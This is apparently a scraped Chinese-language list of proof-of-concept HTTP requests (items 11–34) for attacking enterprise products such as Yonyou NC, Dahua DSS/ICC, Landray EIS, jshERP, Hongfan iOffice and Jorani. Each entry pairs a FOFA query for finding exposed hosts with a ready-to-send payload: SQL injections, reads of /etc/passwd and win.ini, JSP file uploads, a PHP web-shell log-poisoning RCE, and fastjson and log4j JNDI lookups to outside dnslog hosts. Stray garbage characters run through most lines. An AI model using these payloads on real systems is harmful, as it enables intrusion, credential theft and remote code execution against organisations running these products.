" R& A# V( Y0 [" E; l3 w% L: r5 k" C6 O0 K7 ?4 e/ Z  z
3 o& l, Y) z$ V" j8 L# V# \4 W% ?
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入6 A! l3 y9 }/ N& J9 ~, F# e
FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
' E9 i; i" C8 I" Z- H. r$ e& _- O& FGET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1& b  B1 m# {2 |( Z( i# ~8 S2 R5 H
Host: 127.0.0.1
/ ~5 G* d: j: L/ ~* R: \Pragma: no-cache" b/ @- ?- w/ D2 r% Z2 d
Cache-Control: no-cache
+ M& R+ T: Y( x& h) r- NUpgrade-Insecure-Requests: 1+ Q3 i7 A+ ?( |+ O
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
$ w3 d4 H5 e( ^- WAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7& o$ w1 {- g8 D4 K
Accept-Encoding: gzip, deflate
) f  c1 @3 g6 Q, E. }1 L$ LAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
' H, w4 I" L3 R* E9 D8 F% B3 T4 q2 CConnection: close5 Z$ k4 q1 ?  c% {6 Q( |

/ e# i" G) N- [& ?% G9 X7 D; P, K0 _6 T! p) P
12. Jorani < 1.0.2 远程命令执行8 @- _7 k" y& w% q+ M
FOFA:title="Jorani"3 i+ u$ N- R/ }, L4 E/ d
第一步先拿到cookie
8 Y2 k* j0 x9 q) D9 m  WGET /session/login HTTP/1.1
' z( x; D: [3 G3 L# Z  ~Host: 192.168.190.30
- h2 y7 S7 I! M; ?! OUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
8 j2 H1 G, s; u0 d! W3 u) qConnection: close
/ C3 b3 }6 B, P0 g# F% uAccept-Encoding: gzip
+ [8 }8 B0 A! e# `9 z; F% Z$ n: x" D* _: z" ^* w: m

3 Y' X+ C3 F- x) [; w: T7 d1 d响应中csrf_cookie_jorani用于后续请求. X& J  v, x9 m' L
HTTP/1.1 200 OK
3 h& p" C6 `9 A7 t0 P, C3 \8 yConnection: close
1 z0 |: j3 e2 pCache-Control: no-store, no-cache, must-revalidate
9 J; m; x7 S& ]" sContent-Type: text/html; charset=UTF-8
) q, x& T+ F+ mDate: Tue, 24 Oct 2023 09:34:28 GMT
3 [! G3 u, R4 @Expires: Thu, 19 Nov 1981 08:52:00 GMT% z5 M9 n% P2 k; \3 \
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
4 S1 w" v3 B4 O3 r7 k: I8 wPragma: no-cache& O# o. Y) Q! ?
Server: Apache/2.4.54 (Debian)6 D$ i. ~1 d4 q+ t9 k6 f
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/% s3 `  J4 V* L: ~7 F/ M, g) n
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
& l# o( \5 j1 @* Q5 |Vary: Accept-Encoding! ?, ]% I3 y; c% L& N, ]

' P, n; R* y& a% }
. p% R8 B% l* x/ t+ l* _/ qPOST请求,执行函数并进行base64编码
$ d# K( Q& @# y" C4 s; x5 xPOST /session/login HTTP/1.19 a/ z5 t1 D1 N( P/ s
Host: 192.168.190.30
) u$ }; _6 j- CUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36+ |. K# P8 W7 {- F" u: N  h
Connection: close7 d, z! K" P7 H# a. G8 i
Content-Length: 252
/ S# n1 W2 T* g5 e' gContent-Type: application/x-www-form-urlencoded  l* z# ~! \: X9 |
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
; l1 `& G% j. JAccept-Encoding: gzip# O  u) J" u; n8 G! t

, A# v! {7 a4 O) q; [/ Ycsrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor/ r4 Z9 H2 _# k6 l* @( P
1 O  w/ D! e- ^. r( J

/ _: H4 `* @4 G3 T- i, C: I; {1 k! `
向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串
! s9 i, C% ~0 C" {+ u. t* }% }GET /pages/view/log-2023-10-24 HTTP/1.1, r% g0 j/ Q3 f* q# H7 j
Host: 192.168.190.30+ @( c+ C, n% H# U5 K8 j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
. p: n/ B$ O( `1 c' fConnection: close2 T+ L2 L8 H- |0 a* X
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r+ e% H* T. q4 d0 u0 y/ M6 U
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=  v/ b, k/ w1 a2 r+ y
X-REQUESTED-WITH: XMLHttpRequest
3 d1 g; e% P4 U8 h7 p1 PAccept-Encoding: gzip4 R, {  z' b7 P
8 @3 @* d! H% d, m

1 ~+ S$ G' A, x13. 红帆iOffice ioFileDown任意文件读取
+ K; M  u- T* q$ HFOFA:app="红帆-ioffice"2 G2 {( v8 t; g* s( s3 b
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1, @; Z! {/ O, a% a
Host: x.x.x.x
5 [& I0 y9 j3 V( X1 NUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
9 S- R% f1 ?: m& Y/ [; P2 Z$ SConnection: close, M! c& `/ M0 e/ @) d9 f9 ~
Accept: */*: f, o0 y8 Z8 p! H, D1 d
Accept-Encoding: gzip
0 `* i' q; X; i+ u/ ^
7 A$ P+ y3 o7 n  I# i% n: |% }# m- V3 q
14. 华夏ERP(jshERP)敏感信息泄露
7 [3 w2 B8 [- p  ]6 CFOFA:body="jshERP-boot"0 C0 D  Q' L0 M: c1 d
泄露内容包括用户名密码5 S. h% W' N% H  Z/ U1 w
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
# b  {9 ?5 s( }7 vHost: x.x.x.x
$ R# @. H& d$ _( FUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
$ R! l, k" c% k$ H: B! @Connection: close
0 @# K5 n' n( o5 O) i" rAccept: */*: i. `4 R6 B; n2 A: e6 f9 X1 {" j
Accept-Language: en
9 Q, c6 L* @: t, cAccept-Encoding: gzip* Z2 P- u- \$ s; z+ o$ |
0 x+ x; s/ j2 n+ ]; e% K% ~- c

, k/ d* }" L. G% p" U/ K15. 华夏ERP getAllList信息泄露
" d9 Z+ q6 K5 ]6 \+ pCVE-2024-04908 a5 h2 @/ w- h+ R- l. ~4 q% p
FOFA:body="jshERP-boot"3 f9 g* s: |' b3 A
泄露内容包括用户名密码# J7 m) T) M: \" n" Z! q! I4 n" F
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1+ J1 o& I6 l# e5 H# K6 U/ ]8 `$ U
Host: 192.168.40.130:100
4 i1 n) ~9 `6 S# U( OUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36, Z* Y& a' g9 k. s( u
Connection: close/ v* e1 f( n% P
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
7 o* j3 P: j& k* @3 E8 MAccept-Language: en* Y  c1 b- s" P$ L! J
sec-ch-ua-platform: Windows
  _" K* B7 p7 }* p* e- h9 sAccept-Encoding: gzip
* Z- M. O8 \5 C  a6 z  P1 R) y8 \; i5 W; |
8 e+ Y: z: J3 D1 f# |
16.  红帆HFOffice医微云SQL注入
! t( |+ n; l/ c' gFOFA:title="HFOffice"
7 X- y" y" ^+ x2 l. _2 l( O. J- A& [poc中调用函数计算1234的md5值, I0 c" `/ o* N. F
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
/ X$ g) R; [" P- m* ]+ h! {& C+ NHost: x.x.x.x2 {7 T8 H0 a2 N( K. T$ U3 W% p/ s
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
9 I0 m, m" Q9 ]& Z) T# A/ ^Connection: close
* T  a+ R. T, L3 g! ]# ~1 IAccept: */*: e8 `6 w( Z) ^
Accept-Language: en
! A, a! r/ `. @: A6 `! SAccept-Encoding: gzip
3 W; z8 w8 N; m6 d% {/ F2 B2 ?2 u$ ~7 U
- ?' }% }/ ]7 P% K
17. 大华 DSS itcBulletin SQL 注入
5 z4 z/ b: Z4 F3 B$ vFOFA:app="dahua-DSS"
2 b4 `4 a/ S/ C+ ~POST /portal/services/itcBulletin?wsdl HTTP/1.1
. _# l- E4 D$ k! f4 _- S6 T$ nHost: x.x.x.x
2 Q) A! y: G) ~, i- m# e6 A5 \User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
! C; Y9 ^9 D2 l# I, ^Connection: close
; E! G9 Q  i# N& BContent-Length: 345
% O  x+ e( H8 g7 V) j% ?Accept-Encoding: gzip0 O6 S3 {# Q, R/ W" k/ f4 Z

4 g0 }! F; N% _+ v3 a<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
7 f# B& s; ~/ U  C* @! N: @) q<s11:Body>, }, F% ?+ T( h
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
' d; n/ |' G8 j+ s! O, [      <netMarkings>; Z; t# n5 _+ h; V
       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
3 Z7 z7 V6 h3 v* K  a9 o      </netMarkings>
4 b+ ]# _% u' `+ |. a: h+ T  S    </ns1:deleteBulletin>
* H/ m- x' J" L" r1 Q0 a  </s11:Body>
0 I9 ]0 T5 m: r2 }! q</s11:Envelope>) _4 u) o) L9 r1 g

- T, O* |9 x, w5 J8 E# p+ N5 q! E+ L8 p5 @5 u, `0 u& n# _' E
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
4 J5 ?6 S+ @' H4 vFOFA:app="dahua-DSS"& S5 W3 d6 H7 y
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
' V9 k  {9 |6 r9 T1 Q( gHost: your-ip- z) _1 [; v0 y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36& i4 J( _" F- g1 x0 \
Accept-Encoding: gzip, deflate
- f- I" U2 g2 j$ B* O/ SAccept: */*, u5 b. _7 C! {7 i. G! T
Connection: keep-alive+ K3 Q0 M. I# d  g' ^

% c) N" d& y% w- v! s9 h) \+ W' R9 y" a# [

' b. o: \8 r2 K; T/ d19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
. M& n7 k0 w* n) l" {; xFOFA:app="dahua-DSS"' }( ?! T2 l5 P
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.10 d/ A8 h+ r; \& o3 o$ Y. b
Host:
- n' F; e- K! Z# ]6 K- OUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
6 Z! ^) y5 s0 Q) t2 J$ F9 ]3 O) \. MAccept-Encoding: gzip, deflate
5 b2 f3 v& {& bAccept: */*
, M+ w) g" y$ p) z1 b7 g* Q! ?Connection: keep-alive
# S- d0 I( \2 b) b8 r$ N! G+ v# s' o

  {2 C" e% d9 e20. 大华ICC智能物联综合管理平台任意文件读取
- Y  Y1 x! @7 o7 y4 ^* AFOFA:body="*客户端会小于800*"
4 v. ]4 \( \7 h4 tGET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1! \  r# m  I4 J3 t" c
Host: x.x.x.x# `* Z2 ^* Q/ T- h2 H+ `
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
: O9 ^/ K% b- Y- |' k8 P9 r) pConnection: close) ]* w! Z5 N9 X& ^3 F
Accept: */*
, H  m# W0 f' r+ g: _Accept-Language: en
# ~; c$ f# }( `& D( HAccept-Encoding: gzip
' ~6 u1 a! r2 b+ e) m- u1 f+ S% E+ i6 ^& D
4 M' ?3 ~* ~4 P" ^. e" W
21. 大华ICC智能物联综合管理平台random远程代码执行, i  S4 N# Y) `6 T& a) S$ @
FOFA:icon_hash="-1935899595"+ D7 ~6 i7 E8 p; b
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
. q6 b; k. U7 Z; b5 H' [7 THost: x.x.x.x$ R$ d5 E1 \7 _( I! }7 l
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.153 i7 S/ S+ N2 h1 e  |& E; k; ?
Content-Length: 1610 z$ K7 s* a# o* ?' |
Accept-Encoding: gzip& w* [3 X) q  k3 m8 G
Connection: close
# t5 b" q1 M& x$ n1 J9 ?% NContent-Type: application/json;charset=utf-8$ M! U; J8 H9 S6 c2 L
" N2 r0 m7 b: q; l2 }9 S
{8 P2 ~- ?% X, {2 @
"a":{
& _* r- G$ j: r* |0 d# b+ z3 m   "@type":"com.alibaba.fastjson.JSONObject",
* n6 C* B% D; c; s+ O  q    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}% q; k3 W# F  D* o6 W9 n) M: B# o
  }""
- C$ a9 m, X, m7 a% y! E" n}- ?+ }4 h! e. L4 c

, @. z5 Y% d8 h' ~* j4 y1 q9 ^7 ?% c+ v$ n  I3 q, q
22. 大华ICC智能物联综合管理平台 log4j远程代码执行8 B- @1 V/ N1 f+ a5 S
FOFA:icon_hash="-1935899595"- b+ a5 o& |6 Z% U. f  a7 p' B
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1) p1 e9 D! `' e  M) a% H6 ?
Host: your-ip* g1 D$ W: y  Q  q4 Q# E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
8 q' Z) v% M7 O. D1 v& G& VContent-Type: application/json;charset=utf-8& U  W( m6 Q. f! v+ y! _

$ N; `) M: s- V9 a& J3 n{9 s# D8 m" c" y0 M" f/ m8 B' E8 C
"loginName":"${jndi:ldap://dnslog}"
, h" |8 p9 q; o& `3 F- ?8 M. t0 ~, @8 Y% p}, I- L3 Q4 ?& z! W' L9 ~2 p, f
5 e1 m  ?: Q7 I% ~
8 l' K; E  P4 V. z. \$ O5 ^& i
3 |7 k2 R0 F' P& [
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
) u" p6 \& e' W* k: yFOFA:icon_hash="-1935899595"
0 o1 m- P. o7 I8 X' S/ L; Y) ?POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
& i2 n; \: j$ s4 UHost: your-ip
, f2 W$ N; i6 n2 JUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15% J  V+ y, `4 b3 Q1 H+ u8 v
Content-Type: application/json;charset=utf-8; f1 K- q' R& V; b
Accept-Encoding: gzip
) }5 a8 D0 d- a  Q3 N4 Q6 ~Connection: close2 X/ P5 i* ^, P! |& B; B  S$ v
; l$ W* n  q7 w, T
{6 V, i3 z- ]+ Z, S7 N2 r4 ^
    "a":{* K7 Z/ x+ o: e- V
        "@type":"com.alibaba.fastjson.JSONObject",
( a% v/ l1 u8 z; q1 P       {"@type":"java.net.URL","val":"http://DNSLOG"}+ i- v' s) N" p: {
        }""
1 ^/ K% ?. q  }# W, `}
1 W7 M/ H0 K5 K+ Y0 n( \2 v# x- o
4 v  P% O5 Z, B* x9 f
5 |- z( ~0 Q, p- o& r24. 用友NC 6.5 accept.jsp任意文件上传
- k. P3 ~' @. H$ Y5 R- Z; ZFOFA:icon_hash="1085941792"
% C+ ~- l" v, ~1 f- W* m, Z. jPOST /aim/equipmap/accept.jsp HTTP/1.1# r8 R0 h6 g5 `, T3 {% B! S% ?3 L
Host: x.x.x.x
9 L  C& e! D8 ~7 \/ \2 PUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36% v/ j$ s& k4 H0 r3 e+ |- j" p
Connection: close
. G* |9 L' m% _# U! @* PContent-Length: 449
( a# K3 P$ }2 U* ?9 x3 M+ G2 SAccept: */*0 Y4 u5 c; T: Z, O' @4 b0 H
Accept-Encoding: gzip
  ]* t* V8 D' @$ P' bContent-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc- }! r- \# R6 T! r
' j; t& f+ u7 P9 |
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
' ^) h5 z! a9 {. ^4 }Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"& s% M: j& g$ j) Y5 d
Content-Type: text/plain  `& f  F2 N3 P1 D0 r' D" {

9 w9 D3 _5 @% _! G2 y, o. z1 ^5 }<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>0 h3 z( I; d5 Y! |' y4 Y, \) Z& s
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc! [* Y" M4 x& X4 O* b3 ]4 `
Content-Disposition: form-data; name="fname"/ B9 |6 d+ M! g( q: E

% i4 |2 l0 h9 d4 @\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp/ l% b* j! K% K3 ]+ W% C
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--
0 ?' F! T+ g( n+ e: f. x' l. F  s; A5 a6 D* H4 e' I
5 [+ N2 e+ x; S  |. J
25. 用友NC registerServlet JNDI 远程代码执行
6 V" m2 t" Q0 cFOFA:app="用友-UFIDA-NC"
0 l& N2 I  Q+ d2 e) b0 E9 O% nPOST /portal/registerServlet HTTP/1.12 N! k9 I0 A% y$ c
Host: your-ip
& e6 D$ R* }, l8 m% |( a+ ]% IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.02 v, ?+ q- b3 |! ~
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
/ U- x$ a* s0 h. I: u6 V' G# NAccept-Encoding: gzip, deflate+ J* n7 P! k: I- D' T
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6! K$ ^% k0 M3 F: w1 P
Content-Type: application/x-www-form-urlencoded
+ o. M) N# |  x2 H' r0 j1 G  [$ _0 J1 C4 V* C
type=1&dsname=ldap://dnslog3 i0 s$ u# ~' F8 A6 A9 h$ s

7 L' t: ^; |" O4 H- c. l: G) |
3 i. F# k4 o  U3 C" i# t: i& e" D3 c: \
26. 用友NC linkVoucher SQL注入
6 x* j: |4 ~. A/ U+ vFOFA:app="用友-UFIDA-NC"
; M, {9 c/ A% ]+ z0 t9 \7 kGET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1$ b: k( a! ~2 Q7 \
Host: your-ip
' T% J) E( P$ @* _. ?3 ^! t" FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
0 q0 z. K3 |& L! Q5 e$ t0 ~  `- }Content-Type: application/x-www-form-urlencoded
2 F3 k) x9 w' \9 @- y5 VAccept-Encoding: gzip, deflate
' [% o* W& w+ |Accept: */*; c6 d* `% X" d( V  F% P/ l
Connection: keep-alive( r, f* `- }! B1 C8 M

, z% g. _% g/ m" n) a* n) @* M- a0 R! }. ]: f8 Z; u9 G8 Q% q8 z
27. 用友 NC showcontent SQL注入" z# ]; C9 E2 ^3 Q. U! S  z, \- l% Q
FOFA:icon_hash="1085941792"+ W' u. G+ [1 ~; T2 t( K
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1! {8 k* s" x. [
Host: your-ip/ F9 W7 f9 b& H, B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.366 F: `5 L: S, b
Accept-Encoding: identity
) k$ @1 o- F3 U2 p( `Connection: close
' ?7 P- N: z. |6 L) |6 @Content-Type: text/xml; charset=utf-80 Z2 a" a5 v5 m
/ {; _  s" v' J1 ~7 G! A# v8 f6 g
! ~! c4 ~: c! i$ ~# t
28. 用友NC grouptemplet 任意文件上传0 p+ t' M' \; w, N, f
FOFA:icon_hash="1085941792"
  S" A6 g4 A' b  U4 \* y+ n* QPOST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1) D( N5 _% |, q* a. p+ I1 C+ \  t
Host: x.x.x.x+ N5 Y3 _. Q- v( e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
$ T$ B+ A2 p5 S: b8 |/ u0 ^: z+ \Connection: close5 y/ D! z6 _% K$ X! y
Content-Length: 268( @! Y% j6 y# M. y) Z; M$ T; T
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
" S; J0 g( F; u: {% YAccept-Encoding: gzip: J- C8 h4 P6 _: J- T+ L( Q

! V, x* k% n7 ?4 d/ G: n------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
* y: ^3 I  V7 }4 c2 f# z/ v2 {Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp", H1 L+ w. I1 ?7 O' ?" c' P/ F& U
Content-Type: application/octet-stream
) L: V3 ]+ P6 ?2 \# ^( c" l, N4 x- ~
<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>( J' A" K0 y. ?7 b2 B
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--
- z8 M! i# R. e4 W# m+ ?+ |4 x0 z" ]
1 J) O* C/ N' j1 a5 Y+ s
/ t# a( F: Z  N$ v/uapim/static/pages/nc/head.jsp
1 u; }, m, z8 b& P, @7 n6 T
/ p; `0 `/ i$ `7 R3 r) G' ?29. 用友NC down/bill SQL注入- Y4 r0 m( s& d4 \: ]
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"8 F! l; |! |! k4 a' u: I
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
5 e9 |6 v8 @5 j. r( GHost: your-ip
/ V$ B1 i8 N& q* E! y$ ~% W9 mUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
5 K: U: P2 M* n8 H3 K# j( s) L9 u3 `Content-Type: application/x-www-form-urlencoded4 B4 r: h, h- W/ n8 a
Accept-Encoding: gzip, deflate
$ i' i9 S  L" q1 OAccept: */*6 {" U+ S2 y# ^/ l) J2 S6 h
Connection: keep-alive
! X; P1 x+ j$ R$ b* o$ ]/ c% z: b$ p6 K

7 Y9 V. o: L( ?* c/ V: C30. 用友NC importPml SQL注入
2 I: d' X+ ]% S* p9 NFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"+ a. b4 H. W& H) L& Y. R+ [
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
" z7 k8 A0 u; X# YHost: your-ip; h/ t; ~- z: g/ g
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V4 L7 e1 ?; t7 J. C3 L0 `" s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
" U8 r) `$ P6 B! ^0 OConnection: close
' H' A7 Y) T4 N2 I# L1 B  n, c8 p! ]( o
------WebKitFormBoundaryH970hbttBhoCyj9V/ \' p0 ^  C5 L( k6 f
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"( M2 Z% b) D! s# H0 s7 R* _4 o" P
Content-Type: image/jpeg
7 N) |9 P/ q' v' k. }------WebKitFormBoundaryH970hbttBhoCyj9V--
$ b4 u, L* V$ R9 p4 N$ Z( ?8 y/ K9 r+ r' ^9 c4 c$ U5 B  D3 y

$ g7 N  n' ]$ |9 O& l' W31. 用友NC runStateServlet SQL注入& ]+ v* `  k/ u7 N" M2 [+ p
version<=6.5
% O( S' x6 B/ H: K6 N$ YFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
7 p; Y. [, n; H7 }/ L3 {8 S; Y# e$ |2 @GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
$ J* x0 @  a/ {4 {8 kHost: host
4 S* J& Q9 L1 m1 t: X; ?6 ^7 J2 EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36  ]0 {" j4 d; y% S3 q6 O  A
Content-Type: application/x-www-form-urlencoded
7 J4 G  G: V9 A9 I, U
, E  G& b- s1 j( g% [1 M5 T0 `9 ]. Y& Y$ k8 ^
32. 用友NC complainbilldetail SQL注入9 @" _( f* X) ]- i
version= NC633、NC65) ?) r- a  @0 }6 Y" E7 T
FOFA:app="用友-UFIDA-NC"
. j0 D" l8 y" @% }* ]7 z6 q4 l& fGET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1" t' x9 P7 l) K9 w4 c2 S, ?
Host: your-ip
3 K8 S* M7 q' p9 ?7 SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.363 u6 W" y& z. h6 Y. }. v* \
Content-Type: application/x-www-form-urlencoded
2 j; |; ^& k- R! `4 R8 BAccept-Encoding: gzip, deflate* N" }6 s6 c6 `) u1 R& K; Q
Accept: */*5 p; Q6 W, R* N+ }
Connection: keep-alive! B* _/ ?/ Z/ A7 Q+ Y

1 m  z& T) s8 e, k4 f2 g  D
  O7 o+ Z* f# r2 S" D33. 用友NC downTax/download SQL注入
- n% V! {. X2 G4 }8 H% Sversion:NC6.5FOFA:app="用友-UFIDA-NC"
7 a: l; ]' _  A  ]0 bGET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
0 V# P% v7 V3 W4 K1 D, N+ k7 |Host: your-ip
$ l5 k1 n/ ~0 [  v6 n) J/ wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36$ ^! i. ~9 H! E% R) E
Content-Type: application/x-www-form-urlencoded) O9 B* ?7 ?, o; A& v7 O1 m; A5 ?
Accept-Encoding: gzip, deflate
, y  M* ~- D6 B+ DAccept: */*/ K, q9 l: m3 u
Connection: keep-alive- ^. P3 [. S/ h, \$ r1 ]2 K
; V; _9 l: \2 I  r7 \; D+ E

/ b; a$ U6 R8 A34. 用友NC warningDetailInfo接口SQL注入
9 a7 s3 Z) [7 E  `FOFA:app="用友-UFIDA-NC"
' \) X! I- n3 |% x! N* fGET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.13 `; e0 P7 \( o' w0 X" d
Host: your-ip
